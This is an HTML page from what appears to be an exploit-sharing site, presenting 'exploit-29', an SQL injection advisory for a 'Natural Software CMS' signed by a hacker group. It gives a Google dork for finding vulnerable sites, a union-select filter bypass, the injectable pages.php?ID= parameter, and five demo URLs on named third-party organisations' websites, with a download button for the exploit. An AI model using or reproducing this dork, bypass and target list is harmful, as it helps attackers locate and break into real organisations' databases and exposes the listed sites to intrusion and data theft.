<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-29</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-29" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ###########################

# Natural Software CMS SQL Injection Vulnerability

###########################

* Title : Natural Software CMS SQL Injection
* Date : 7/5/2016
* Exploit Author : MR.IMAN
* Google Dork: intext:"Natural Software" & inurl:pages.php?ID=
* Vendor Homepage: http://www.usps.org/newpublic2/join.html
* Version : All Version
* Category: webapps
* Tested On : windows 10,kali linux
 
 
HEllo Guys.
This Is a bypas Sql Injecdtion  Vulnerability and you can Inject
this site whit out of bypass
 
Bypass union select : -Before Number ID & /*!50000union*/+select
 
PoC:
vulnerable : wrappers/pages.php?ID=
Vulnerability : Sql Injection
Response : Error reading pages select * from pages where page_id =
 
----------------------------------
 
Demo :
http://www.flpowersquadron.org/wrappers/pages.php?ID=25%27
http://www.oshkoshsquadron.org/wrappers/pages.php?ID=14%27
http://www.uspsdistrict4.org/wrappers/pages.php?ID=14%27
http://www.capefearsailandpowersquadron.org/wrappers/pages.php?ID=4'
http://www.santaclarapowersquadron.org/wrappers/pages.php?ID=38%27
 
 
* Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Mr.Root
* Discovered By : MR.IMAN
* We Are Guardiran Security Team

        </pre>
    </body>
</html>